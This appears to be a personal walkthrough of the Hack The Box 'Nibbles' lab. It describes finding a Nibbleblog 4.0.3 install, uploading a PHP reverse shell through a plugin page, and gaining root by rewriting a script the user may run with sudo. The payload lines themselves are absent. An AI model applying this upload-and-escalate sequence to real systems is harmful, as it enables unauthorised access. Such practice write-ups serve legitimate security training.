After Bashed is Traceback but I’ve done that before; next is Nibbles.
SSH and HTTP only.
The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It’s running a CMS called nibbleblog; searchsploit says there are two exploits; SQLi in version 3 and an arbitrary file upload in version 4.0.3. It’s not immediately clear which we have.
Some enumeration reveals http://10.10.10.75/nibbleblog/README:
====== Nibbleblog ======
Release date: 2014-04-01
So we’re after the arbitrary file upload; but it needs authentication. I try bruteforcing the login, but it has a protection mechanism whereby you are locked out after only a few attempts. I google for how to defeat it, but all of the results are Nibbles writeups!
This blog talks about how to get around the bruteforce prevention without spoiling the rest of the box, but it also gives up the password. I feel a bit conflicted about this, but I use it and log in.
I also fork the repo with the script (Python) for future reference.
The exploit from Searchsploit is a Metasploit module. Nah, let’s see if we can do it manually. It looks fairly straightfoward. We use the GUI to upload a file (the Pentestmonkey PHP reverse shell) at http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
This prints a bunch of warnings: e.g.
Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
But even so it does work. We visit the shell (it gets renamed to image.php) at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php and we get our shell
We are nibbler. My shell is a bit dodgy and sudo -l won’t work. However it works via linpeas for some reason, and we can run /home/nibbler/personal/stuff/monitor.sh as root. Okey dokey. This file doesn’t actually exist, but there is a zipfile called personal which we can unzip and it creates the path and file. We own monitor.sh so we can make it whatever we want. I try a few payloads before I get one that works:
In my listener:
So that was that but I can’t help feel I missed the most important part of this challenge. Anyway; next cab off the rank is Optimum. I’ll have a crack at that tomorrow.